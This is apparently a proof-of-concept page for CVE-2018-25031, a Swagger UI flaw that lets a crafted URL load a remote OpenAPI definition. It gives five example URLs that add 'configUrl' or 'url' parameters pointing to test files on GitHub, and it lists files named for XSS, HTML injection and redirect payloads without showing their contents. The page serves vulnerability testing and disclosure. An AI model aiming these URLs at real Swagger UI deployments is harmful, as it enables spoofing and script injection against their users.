CVE-2018-25031 PoC — Swagger UI 输入验证错误漏洞

Source

Associated Vulnerability

Description

CVE-2018-25031 tests

Readme

# CVE-2018-25031

CVE-2018-25031 exploits tests

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

## HowTo

Find the documentation endpoint and add the parameter "configUrl" pointing to test.json or "url" pointing to test.yaml.
```
https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
```

## Screenshots

![image](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b8267eec-332d-477f-a6e1-5087ab15f607)
![tempsnip](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b5104f39-c3cb-4d5d-8496-06c31337b3d7)

File Snapshot

 [4.0K]  /data/pocs/d05db86ca515ae04f04215b4edf751a741cf23a8
├── [2.7K]  f.yaml
├── [ 258]  htmli.json
├── [1.4K]  htmli.yaml
├── [1.2K]  README.md
├── [1.5K]  redirect.yaml
├── [ 256]  test.json
├── [1.3K]  test.yaml
├── [1.4K]  xss2.yaml
├── [ 254]  xss.json
└── [1.4K]  xss.yaml

0 directories, 10 files

Remarks